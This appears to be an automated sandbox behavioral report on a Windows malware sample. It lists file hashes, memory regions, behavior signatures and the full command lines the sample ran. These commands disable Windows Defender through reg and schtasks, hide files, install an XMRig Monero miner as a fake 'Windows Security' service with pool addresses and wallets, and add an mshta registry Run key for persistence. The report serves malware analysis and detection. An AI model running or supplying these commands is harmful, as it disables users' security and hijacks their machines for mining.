| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
memory/2208-153-0x0000000075530000-0x0000000075541000-memory.dmp
memory/1264-154-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4872-155-0x0000000005AB0000-0x0000000005B16000-memory.dmp
memory/2280-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
memory/2280-160-0x0000000140000000-0x0000000140CDE000-memory.dmp
memory/2280-159-0x00000000001D0000-0x00000000001E0000-memory.dmp
memory/2280-161-0x00000000004D0000-0x00000000004F0000-memory.dmp
memory/2280-162-0x0000000140000000-0x0000000140CDE000-memory.dmp
memory/2280-163-0x00000000004F0000-0x0000000000510000-memory.dmp
memory/2280-164-0x00000000004F0000-0x0000000000510000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
125s
Max time network
122s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Windows\System32\WScript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" | C:\Windows\System32\WScript.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 35 | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 18446744065119617044 | N/A | C:\Perform\Resources\NSudo.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Perform\7za.exe
7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
C:\Perform\update.exe
C:\Perform\update.exe
C:\Perform\Resources\NSudo.exe
C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\nssm.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\7za.exe
C:\Perform\nssm.exe
nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\Defender.exe
C:\Perform\nssm.exe
nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e34f50,0x7fef6e34f60,0x7fef6e34f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=952 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1120 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1292 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | tcp |
| US | 8.8.8.8:53 | resources.blogblog.com | udp |
| US | 8.8.8.8:53 | www.blogger.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| US | 8.8.8.8:53 | themes.googleusercontent.com | udp |
| NL | 142.251.39.97:443 | themes.googleusercontent.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | udp |
Files
memory/1808-54-0x0000000076171000-0x0000000076173000-memory.dmp
memory/1736-55-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat
| MD5 | 55f5a5033d59e83f200f78efd8cf9ffd |
| SHA1 | b153b8f0da50ffc56996bafa0be0610cec8b9d99 |
| SHA256 | d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041 |
| SHA512 | 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047 |
memory/1780-57-0x0000000000000000-mapping.dmp
memory/1420-58-0x0000000000000000-mapping.dmp
memory/1296-59-0x0000000000000000-mapping.dmp
memory/1212-60-0x0000000000000000-mapping.dmp
memory/1768-61-0x0000000000000000-mapping.dmp
memory/1284-62-0x0000000000000000-mapping.dmp
memory/2008-63-0x0000000000000000-mapping.dmp
memory/1408-64-0x0000000000000000-mapping.dmp
memory/1980-65-0x0000000000000000-mapping.dmp
memory/896-66-0x0000000000000000-mapping.dmp
memory/572-67-0x0000000000000000-mapping.dmp
memory/660-68-0x0000000000000000-mapping.dmp
memory/1540-69-0x0000000000000000-mapping.dmp
memory/1944-70-0x0000000000000000-mapping.dmp
memory/904-71-0x0000000000000000-mapping.dmp
memory/600-72-0x0000000000000000-mapping.dmp
memory/672-73-0x0000000000000000-mapping.dmp
memory/1704-74-0x0000000000000000-mapping.dmp
memory/1012-75-0x0000000000000000-mapping.dmp
memory/876-76-0x0000000000000000-mapping.dmp
memory/1836-77-0x0000000000000000-mapping.dmp
memory/1380-78-0x0000000000000000-mapping.dmp
memory/1972-79-0x0000000000000000-mapping.dmp
memory/1208-80-0x0000000000000000-mapping.dmp
memory/1724-81-0x0000000000000000-mapping.dmp
memory/1180-82-0x0000000000000000-mapping.dmp
memory/1848-83-0x0000000000000000-mapping.dmp
memory/1524-84-0x0000000000000000-mapping.dmp
memory/1652-85-0x0000000000000000-mapping.dmp
memory/744-86-0x0000000000000000-mapping.dmp
memory/1152-87-0x0000000000000000-mapping.dmp
memory/1556-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\files.7z
| MD5 | 6380cb936d9229799750c4416ad99a81 |
| SHA1 | d1efa33ab91b12e336190774e616f5e420979201 |
| SHA256 | f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce |
| SHA512 | 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970 |
C:\Users\Admin\AppData\Local\Temp\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
memory/1800-91-0x0000000000000000-mapping.dmp
C:\Perform\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
memory/1272-94-0x0000000000000000-mapping.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
memory/1272-96-0x000007FEFC281000-0x000007FEFC283000-memory.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
C:\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/360-104-0x0000000000000000-mapping.dmp
C:\Perform\up.vbs
| MD5 | 9fc9cd6fff29c03e2b164cafe21543a1 |
| SHA1 | c348cd40f9e112413a2587ef3036628a056aee13 |
| SHA256 | b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1 |
| SHA512 | 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b |
memory/612-115-0x0000000000000000-mapping.dmp
\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/1420-118-0x0000000000000000-mapping.dmp
memory/1004-123-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
C:\Perform\Defender.exe
| MD5 | 33dcb753b2236649ae2f13d898e8eb5d |
| SHA1 | f9be1a9b50b55d9244e20c8ea79ad276854f461c |
| SHA256 | f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160 |
| SHA512 | 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731 |
memory/1768-121-0x0000000000000000-mapping.dmp
memory/1980-125-0x0000000000000000-mapping.dmp
memory/772-127-0x0000000000000000-mapping.dmp
memory/1324-129-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
memory/768-131-0x0000000000000000-mapping.dmp
\??\pipe\crashpad_684_OOORIFOLVJJRYXLR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
